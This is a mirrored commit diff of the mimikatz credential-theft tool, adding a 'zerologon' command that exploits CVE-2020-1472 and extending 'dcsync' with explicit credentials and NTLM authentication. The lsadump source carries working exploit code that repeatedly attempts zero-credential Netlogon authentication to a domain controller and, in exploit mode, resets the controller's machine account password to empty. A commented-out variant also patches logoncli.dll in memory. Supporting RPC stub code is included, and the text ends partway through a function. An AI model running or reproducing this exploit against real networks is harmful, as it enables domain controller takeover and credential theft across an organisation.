RepoMirrors
/
mimikatz
mirror of https://github.com/gentilkiwi/mimikatz
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

[new] mimikatz lsadump::zerologon (CVE-2020-1472 @SecuraBV @djrevmoon) 

[new] mimikatz lsadump::dcsync now supports NTLM auth and explicit credentials
[internal] netlogon RPC instead of NETAPI32.dll (support ncap_ip_tcp instead of ncap_np)
This commit is contained in:
Benjamin DELPY 2020-09-16 12:16:07 +02:00
parent ba8d11ebe1
commit 880c15994c
8 changed files with 311 additions and 45 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
mimikatz.sln
View File

@ -1,6 +1,6 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2012
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimikatz", "mimikatz\mimikatz.vcxproj", "{FB9B5E61-7C34-4280-A211-E979E1D6977F}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "global files", "global files", "{1ADABD33-DEBE-4095-8EAE-9B6ED51DB68E}"
@ -30,6 +30,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF
inc\WDBGEXTS.H = inc\WDBGEXTS.H
inc\WinBer.h = inc\WinBer.h
inc\wincred.h = inc\wincred.h
inc\WinDNS.h = inc\WinDNS.h
inc\Winldap.h = inc\Winldap.h
EndProjectSection
EndProject
@ -84,69 +85,65 @@ Global
Svn-Managed = True
Manager = AnkhSVN - Subversion Support for Visual Studio
EndGlobalSection
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|ARM64 = Release|ARM64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
Release|ARM64 = Release|ARM64
Second_Release_PowerShell|ARM64 = Second_Release_PowerShell|ARM64
Second_Release_PowerShell|Win32 = Second_Release_PowerShell|Win32
Second_Release_PowerShell|x64 = Second_Release_PowerShell|x64
Second_Release_PowerShell|ARM64 = Second_Release_PowerShell|ARM64
Simple_DLL|ARM64 = Simple_DLL|ARM64
Simple_DLL|Win32 = Simple_DLL|Win32
Simple_DLL|x64 = Simple_DLL|x64
Simple_DLL|ARM64 = Simple_DLL|ARM64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|ARM64.ActiveCfg = Release|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|Win32.ActiveCfg = Release|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|Win32.Build.0 = Release|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|x64.ActiveCfg = Release|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|x64.Build.0 = Release|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|ARM64.ActiveCfg = Release|ARM64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Release|ARM64.Build.0 = Release|ARM64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|ARM64.ActiveCfg = Second_Release_PowerShell|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|Win32.ActiveCfg = Second_Release_PowerShell|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|Win32.Build.0 = Second_Release_PowerShell|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|x64.ActiveCfg = Second_Release_PowerShell|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|x64.Build.0 = Second_Release_PowerShell|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Second_Release_PowerShell|ARM64.ActiveCfg = Second_Release_PowerShell|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|ARM64.ActiveCfg = Simple_DLL|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|Win32.ActiveCfg = Simple_DLL|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|Win32.Build.0 = Simple_DLL|Win32
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|x64.ActiveCfg = Simple_DLL|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|x64.Build.0 = Simple_DLL|x64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|ARM64.ActiveCfg = Simple_DLL|ARM64
{FB9B5E61-7C34-4280-A211-E979E1D6977F}.Simple_DLL|ARM64.Build.0 = Simple_DLL|ARM64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|ARM64.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|Win32.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|Win32.Build.0 = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|x64.ActiveCfg = Release|x64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|x64.Build.0 = Release|x64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|ARM64.ActiveCfg = Release|ARM64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Release|ARM64.Build.0 = Release|ARM64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Simple_DLL|Win32.ActiveCfg = Release|Win32
{E049487C-C5BD-471E-99AE-C756E70B6520}.Simple_DLL|x64.ActiveCfg = Release|x64
{E049487C-C5BD-471E-99AE-C756E70B6520}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|Win32.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|Win32.Build.0 = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|x64.ActiveCfg = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|x64.Build.0 = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Release|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Simple_DLL|Win32.ActiveCfg = Release|Win32
{86FF6D04-208C-442F-B27C-E4255DD39402}.Simple_DLL|x64.ActiveCfg = Release|x64
{86FF6D04-208C-442F-B27C-E4255DD39402}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|Win32.Build.0 = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Release|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Second_Release_PowerShell|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Simple_DLL|Win32.ActiveCfg = Release|Win32
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Simple_DLL|x64.ActiveCfg = Release|x64
{60D02E32-1711-4D9E-9AC2-10627C52EB40}.Simple_DLL|ARM64.ActiveCfg = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE

2
mimikatz/mimikatz.vcxproj
View File

@ -150,6 +150,7 @@
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-credentialkeys.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-dcom_IObjectExporter_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-drsr_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-nrpc_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-pac.c" />
<ClCompile Include="..\modules\kull_m_service.c" />
<ClCompile Include="..\modules\kull_m_string.c" />
@ -263,6 +264,7 @@
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-dcom_IObjectExporter.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-drsr.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-bkrp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-nrpc.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-pac.h" />
<ClInclude Include="..\modules\kull_m_samlib.h" />
<ClInclude Include="..\modules\kull_m_service.h" />

6
mimikatz/mimikatz.vcxproj.filters
View File

@ -311,6 +311,9 @@
<ClCompile Include="..\modules\kull_m_crypto_ngc.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-nrpc_c.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimikatz.h" />
@ -641,6 +644,9 @@
<ClInclude Include="..\modules\kull_m_crypto_ngc.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-nrpc.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="local modules">

123
mimikatz/modules/kuhl_m_lsadump.c
View File

@ -20,6 +20,7 @@ const KUHL_M_C kuhl_m_c_lsadump[] = {
{kuhl_m_lsadump_netsync, L"netsync", L"Ask a DC to send current and previous NTLM hash of DC/SRV/WKS"},
{kuhl_m_lsadump_packages, L"packages", NULL},
{kuhl_m_lsadump_mbc, L"mbc", NULL},
{kuhl_m_lsadump_zerologon, L"zerologon", NULL},
};
const KUHL_M kuhl_m_lsadump = {
@ -2436,3 +2437,125 @@ NTSTATUS kuhl_m_lsadump_mbc(int argc, wchar_t * argv[])
}
return STATUS_SUCCESS;
}
// Just to let you know about the little hack to make NETAPI32 to use ncacn_ip_tcp instead of ncacn_np
//
//NTSTATUS kuhl_m_lsadump_zerologon(int argc, wchar_t * argv[])
//{
// DWORD i;
// NETLOGON_CREDENTIAL Input = {0}, LazyOutput;
// ULONG NegotiateFlags = 0x212fffff;
//
// PBYTE z = (PBYTE) GetModuleHandle(L"logoncli.dll");
//
// VirtualProtect(z + 0x19031, 1, PAGE_EXECUTE_READWRITE, &i);
// z[0x19031] = 2;
// VirtualProtect(z + 0x19031, 1, i, &i);
//
// for(i = 0; i < 2000; i++)
// {
// I_NetServerReqChallenge(L"dc.lab.local", MIMIKATZ, &Input, &LazyOutput);
// if((I_NetServerAuthenticate2(L"dc.lab.local", L"dc$", ServerSecureChannel, MIMIKATZ, &Input, &LazyOutput, &NegotiateFlags) == STATUS_SUCCESS))
// {
// kprintf(L"\nAuth :)\n");
// break;
// }
// else kprintf(L"=");
// }
// return STATUS_SUCCESS;
//}
// All of that is not very thread safe
handle_t hLogonNetLogon = NULL;
handle_t __RPC_USER LOGONSRV_HANDLE_bind(IN LOGONSRV_HANDLE Name) {return hLogonNetLogon;}
void __RPC_USER LOGONSRV_HANDLE_unbind(IN LOGONSRV_HANDLE Name, handle_t hLogon) {}
const wchar_t * SecureChannelTypes[] = {L"Null", L"MsvAp", L"Workstation", L"TrustedDnsDomain", L"TrustedDomain", L"UasServer", L"Server", L"CdcServer"};
NTSTATUS kuhl_m_lsadump_zerologon(int argc, wchar_t * argv[])
{
NTSTATUS status;
NETLOGON_AUTHENTICATOR Authenticator = {{0}, 0}, ReturnAuthenticator;
ULONG i, NegotiateFlags = 0x212fffff;
NL_TRUST_PASSWORD ClearNewPassword = {{0}, 0};
LPCWSTR szTarget, szAccount, szType;
NETLOGON_SECURE_CHANNEL_TYPE type = ServerSecureChannel;
BOOL bExploit, bIsAuth = FALSE, bIsChanged = FALSE;
if(kull_m_string_args_byName(argc, argv, L"target", &szTarget, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"account", &szAccount, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"type", &szType, NULL))
type = (NETLOGON_SECURE_CHANNEL_TYPE) wcstoul(szType, NULL, 0);
bExploit = kull_m_string_args_byName(argc, argv, L"exploit", NULL, NULL);
kprintf(L"Target : %s\nAccount: %s\nType : %u (%s)\nMode : %s\n\n", szTarget, szAccount, type, (type < ARRAYSIZE(SecureChannelTypes)) ? SecureChannelTypes[type] : L"?", bExploit ? L"exploit" : L"detect");
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szTarget, NULL, NULL, FALSE, RPC_C_AUTHN_NONE, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hLogonNetLogon, NULL))
{
status = RpcEpResolveBinding(hLogonNetLogon, logon_v1_0_c_ifspec);
if(status == RPC_S_OK)
{
kprintf(L"Trying to \'authenticate\'...\n");
RpcTryExcept
{
for(i = 0; i < 2000; i++)
{
status = NetrServerReqChallenge(NULL, MIMIKATZ, &Authenticator.Credential, &ReturnAuthenticator.Credential);
if(status == STATUS_SUCCESS)
{
status = NetrServerAuthenticate2(NULL, (wchar_t *) szAccount, type, MIMIKATZ, &Authenticator.Credential, &ReturnAuthenticator.Credential, &NegotiateFlags);
if(status == STATUS_SUCCESS)
{
bIsAuth = TRUE;
kprintf(L"\n\n NetrServerAuthenticate2: 0x%08x", status);
if(bExploit)
{
kprintf(L"\n");
status = NetrServerPasswordSet2(NULL, (wchar_t *) szAccount, type, MIMIKATZ, &Authenticator, &ReturnAuthenticator, &ClearNewPassword);
if(status == STATUS_SUCCESS)
{
bIsChanged = TRUE;
kprintf(L" NetrServerPasswordSet2 : 0x%08x", status);
}
else PRINT_ERROR(L"NetrServerPasswordSet2: 0x%08x", status);
}
break;
}
else if(status == STATUS_NO_TRUST_SAM_ACCOUNT)
{
PRINT_ERROR(L"NetrServerAuthenticate2: STATUS_NO_TRUST_SAM_ACCOUNT (cannot find the account or bad type)", status);
break;
}
else if(status != STATUS_ACCESS_DENIED)
{
PRINT_ERROR(L"NetrServerAuthenticate2: 0x%08x", status);
break;
}
else kprintf(L"=");
}
else
{
PRINT_ERROR(L"NetrServerReqChallenge: 0x%08x", status);
break;
}
}
}
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
kprintf(L"\n\n* Authentication: %s\n", bIsAuth ? L"OK -- vulnerable" : L"KO -- maybe not vulnerable");
if(bExploit)
{
kprintf(L"* Set password : %s\n", bIsChanged ? L"OK -- may be unstable" : L"KO");
}
}
else PRINT_ERROR(L"RpcEpResolveBinding: 0x%08x\n", status);
kull_m_rpc_deleteBinding(&hLogonNetLogon);
}
}
else PRINT_ERROR(L"Missing /account argument, usually a DC$ account\n");
}
else PRINT_ERROR(L"Missing /target argument, can be IP or FQDN of a domain controller\n");
return STATUS_SUCCESS;
}

23
mimikatz/modules/kuhl_m_lsadump.h
View File

@ -15,6 +15,7 @@
#include "../modules/kull_m_string.h"
#include "../modules/kull_m_samlib.h"
#include "../modules/kull_m_net.h"
#include "../../modules/rpc/kull_m_rpc_ms-nrpc.h"
#include "lsadump/kuhl_m_lsadump_dc.h"
#include "kuhl_m_lsadump_remote.h"
#include "kuhl_m_crypto.h"
@ -69,6 +70,7 @@ NTSTATUS kuhl_m_lsadump_changentlm(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_netsync(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_packages(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_mbc(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_lsadump_zerologon(int argc, wchar_t * argv[]);
BOOL kuhl_m_lsadump_getSids(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY hPolicyBase, IN LPCWSTR littleKey, IN LPCWSTR prefix);
BOOL kuhl_m_lsadump_getComputerAndSyskey(IN PKULL_M_REGISTRY_HANDLE hRegistry, IN HKEY hSystemBase, OUT LPBYTE sysKey);
@ -501,27 +503,6 @@ PKERB_KEY_DATA kuhl_m_lsadump_lsa_keyDataInfo(PVOID base, PKERB_KEY_DATA keys, U
PKERB_KEY_DATA_NEW kuhl_m_lsadump_lsa_keyDataNewInfo(PVOID base, PKERB_KEY_DATA_NEW keys, USHORT Count, PCWSTR title);
void kuhl_m_lsadump_lsa_DescrBuffer(DWORD type, DWORD rid, PVOID Buffer, DWORD BufferSize);
typedef wchar_t * LOGONSRV_HANDLE;
typedef struct _NETLOGON_CREDENTIAL {
CHAR data[8];
} NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL;
typedef struct _NETLOGON_AUTHENTICATOR {
NETLOGON_CREDENTIAL Credential;
DWORD Timestamp;
} NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR;
typedef enum _NETLOGON_SECURE_CHANNEL_TYPE{
NullSecureChannel = 0,
MsvApSecureChannel = 1,
WorkstationSecureChannel = 2,
TrustedDnsDomainSecureChannel = 3,
TrustedDomainSecureChannel = 4,
UasServerSecureChannel = 5,
ServerSecureChannel = 6,
CdcServerSecureChannel = 7
} NETLOGON_SECURE_CHANNEL_TYPE;
#define SECRET_SET_VALUE 0x00000001L
#define SECRET_QUERY_VALUE 0x00000002L

30
mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
View File

@ -41,8 +41,9 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL, szService;
LPWSTR szTmpDc = NULL;
DRS_EXTENSIONS_INT DrsExtensionsInt;
BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL);
BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL), bAuthNtlm = kull_m_string_args_byName(argc, argv, L"authntlm", NULL, NULL);
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
szDomain = pPolicyDnsDomainInfo->DnsDomainName.Buffer;
@ -66,8 +67,31 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
else
kprintf(L"[DC] \'%s\' will be the user account\n", szUser);
if(kull_m_string_args_byName(argc, argv, L"authuser", (const wchar_t **) &secIdentity.User, NULL))
{
secIdentity.UserLength = lstrlen((LPCWSTR) secIdentity.User);
if(kull_m_string_args_byName(argc, argv, L"authdomain", (const wchar_t **) &secIdentity.Domain, L""))
{
secIdentity.DomainLength = lstrlen((LPCWSTR) secIdentity.Domain);
}
secIdentity.UserLength = lstrlen((LPCWSTR) secIdentity.User);
if(kull_m_string_args_byName(argc, argv, L"authpassword", (const wchar_t **) &secIdentity.Password, L""))
{
secIdentity.PasswordLength = lstrlen((LPCWSTR) secIdentity.Password);
}
}
if(secIdentity.UserLength)
{
kprintf(L"[AUTH] Username: %s\n[AUTH] Domain : %s\n[AUTH] Password: %s\n", secIdentity.User, secIdentity.Domain, secIdentity.Password);
}
if(bAuthNtlm)
{
kprintf(L"[AUTH] Explicit NTLM Mode\n");
}
kull_m_string_args_byName(argc, argv, L"altservice", &szService, L"ldap");
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, (MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, bAuthNtlm ? RPC_C_AUTHN_WINNT : ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
{
if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &DrsExtensionsInt))
{

40
modules/rpc/kull_m_rpc_ms-nrpc.h Normal file
View File

@ -0,0 +1,40 @@
#pragma once
#include "kull_m_rpc.h"
#include "../kull_m_samlib.h"
typedef wchar_t * LOGONSRV_HANDLE;
typedef struct _NETLOGON_CREDENTIAL {
CHAR data[8];
} NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL;
typedef enum _NETLOGON_SECURE_CHANNEL_TYPE {
NullSecureChannel = 0,
MsvApSecureChannel = 1,
WorkstationSecureChannel = 2,
TrustedDnsDomainSecureChannel = 3,
TrustedDomainSecureChannel = 4,
UasServerSecureChannel = 5,
ServerSecureChannel = 6,
CdcServerSecureChannel = 7
} NETLOGON_SECURE_CHANNEL_TYPE;
typedef struct _NETLOGON_AUTHENTICATOR {
NETLOGON_CREDENTIAL Credential;
DWORD Timestamp;
} NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR;
typedef struct _NL_TRUST_PASSWORD {
WCHAR Buffer[256];
ULONG Length;
} NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD;
NTSTATUS NetrServerReqChallenge(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientChallenge, OUT PNETLOGON_CREDENTIAL ServerChallenge);
NTSTATUS NetrServerAuthenticate2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientCredential, OUT PNETLOGON_CREDENTIAL ServerCredential, IN OUT ULONG *NegotiateFlags);
NTSTATUS NetrServerPasswordSet2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, IN PNL_TRUST_PASSWORD ClearNewPassword);
NTSTATUS NetrServerTrustPasswordsGet(IN LOGONSRV_HANDLE TrustedDcName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedNewOwfPassword, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedOldOwfPassword);
extern handle_t hLogon;
extern RPC_IF_HANDLE logon_v1_0_c_ifspec;
handle_t __RPC_USER LOGONSRV_HANDLE_bind(IN LOGONSRV_HANDLE Name);
void __RPC_USER LOGONSRV_HANDLE_unbind(IN LOGONSRV_HANDLE Name, handle_t hLogon);

93
modules/rpc/kull_m_rpc_ms-nrpc_c.c Normal file
View File

@ -0,0 +1,93 @@
#include "kull_m_rpc_ms-nrpc.h"
typedef struct _netlogon_MIDL_TYPE_FORMAT_STRING {
SHORT Pad;
UCHAR Format[101];
} netlogon_MIDL_TYPE_FORMAT_STRING;
typedef struct _netlogon_MIDL_PROC_FORMAT_STRING {
SHORT Pad;
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
CHAR Format[309];
#elif defined(_M_IX86)
CHAR Format[301];
#endif
} netlogon_MIDL_PROC_FORMAT_STRING;
extern const netlogon_MIDL_TYPE_FORMAT_STRING netlogon__MIDL_TypeFormatString;
extern const netlogon_MIDL_PROC_FORMAT_STRING netlogon__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE logon___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x12345678, 0x1234, 0xabcd, {0xef, 0x00, 0x01, 0x23, 0x45, 0x67, 0xcf, 0xfb}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
RPC_IF_HANDLE logon_v1_0_c_ifspec = (RPC_IF_HANDLE) &logon___RpcClientInterface;
handle_t hLogon;
static const GENERIC_BINDING_ROUTINE_PAIR BindingRoutines[] = {{(GENERIC_BINDING_ROUTINE) LOGONSRV_HANDLE_bind, (GENERIC_UNBIND_ROUTINE) LOGONSRV_HANDLE_unbind}};
static const MIDL_STUB_DESC logon_StubDesc = {(void *) & logon___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &hLogon, 0, BindingRoutines, 0, 0, netlogon__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
NTSTATUS NetrServerReqChallenge(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientChallenge, OUT PNETLOGON_CREDENTIAL ServerChallenge)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[0], PrimaryName, ComputerName, ClientChallenge, ServerChallenge).Simple;
}
NTSTATUS NetrServerAuthenticate2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_CREDENTIAL ClientCredential, OUT PNETLOGON_CREDENTIAL ServerCredential, IN OUT ULONG *NegotiateFlags)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[62], PrimaryName, AccountName, SecureChannelType, ComputerName, ClientCredential, ServerCredential, NegotiateFlags).Simple;
}
NTSTATUS NetrServerPasswordSet2(IN LOGONSRV_HANDLE PrimaryName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, IN PNL_TRUST_PASSWORD ClearNewPassword)
{
return (NTSTATUS) NdrClientCall2((PMIDL_STUB_DESC) &logon_StubDesc, (PFORMAT_STRING) &netlogon__MIDL_ProcFormatString.Format[142], PrimaryName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, ClearNewPassword).Simple;
}
NTSTATUS NetrServerTrustPasswordsGet(IN LOGONSRV_HANDLE TrustedDcName, IN wchar_t *AccountName, IN NETLOGON_SECURE_CHANNEL_TYPE SecureChannelType, IN wchar_t *ComputerName, IN PNETLOGON_AUTHENTICATOR Authenticator, OUT PNETLOGON_AUTHENTICATOR ReturnAuthenticator, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedNewOwfPassword, OUT PENCRYPTED_NT_OWF_PASSWORD EncryptedOldOwfPassword)
{
